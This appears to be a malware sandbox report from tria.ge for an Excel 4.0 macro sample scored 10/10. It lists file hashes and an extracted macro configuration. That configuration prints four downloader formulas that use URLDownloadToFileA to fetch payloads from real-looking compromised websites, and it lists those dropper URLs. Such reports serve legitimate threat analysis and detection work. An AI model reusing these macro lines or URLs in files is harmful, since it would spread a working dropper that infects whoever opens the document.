Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

General

  • Target

    f4b558ed2d3d7061a47277380eb22d57fd3ebd1ff339dceb1cfd58eb8d044bad

  • Size

    95KB

  • Sample

    241120-xc88qa1bqa

  • MD5

    80a4a339331e6edbe2efde77a87cc2e0

  • SHA1

    9ed2a841af1b5aea5fd1ab5df3d6b22df1e77e09

  • SHA256

    f4b558ed2d3d7061a47277380eb22d57fd3ebd1ff339dceb1cfd58eb8d044bad

  • SHA512

    b96bf9fb5937e5861194937200dca3d0f5e918fe851d0f90f304b93e0522eb57c76c3b687809036670435919b0bc306f0a0553fd9b7b49caa4dc77aace2fcaa3

  • SSDEEP

    1536:iFKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgYHuS4hcTO97v7UYdEJmFF2:cKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgo

Score
10/10

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://educacionsanvicentefundacion.com/iplookup/wYEInbaN/", "..\uoya1.ocx")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "https://www.4monkeys.com/wp-admin/dNAuBEKo/", "..\uoya2.ocx")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://haircutbar.com/cgi-bin/dNfEA5F/", "..\uoya3.ocx")
4
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://gedebey-tvradio.info/wp-includes/T0J9THbd5f2/", "..\uoya4.ocx")
URLs
xlm40.dropper

https://educacionsanvicentefundacion.com/iplookup/wYEInbaN/

xlm40.dropper

https://www.4monkeys.com/wp-admin/dNAuBEKo/

xlm40.dropper

http://haircutbar.com/cgi-bin/dNfEA5F/

xlm40.dropper

http://gedebey-tvradio.info/wp-includes/T0J9THbd5f2/

Targets

    • Target

      f4b558ed2d3d7061a47277380eb22d57fd3ebd1ff339dceb1cfd58eb8d044bad

    • Size

      95KB

    • MD5

      80a4a339331e6edbe2efde77a87cc2e0

    • SHA1

      9ed2a841af1b5aea5fd1ab5df3d6b22df1e77e09

    • SHA256

      f4b558ed2d3d7061a47277380eb22d57fd3ebd1ff339dceb1cfd58eb8d044bad

    • SHA512

      b96bf9fb5937e5861194937200dca3d0f5e918fe851d0f90f304b93e0522eb57c76c3b687809036670435919b0bc306f0a0553fd9b7b49caa4dc77aace2fcaa3

    • SSDEEP

      1536:iFKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgYHuS4hcTO97v7UYdEJmFF2:cKpb8rGYrMPe3q7Q0XV5xtezEsi8/dgo

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Enterprise v15

Tasks

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.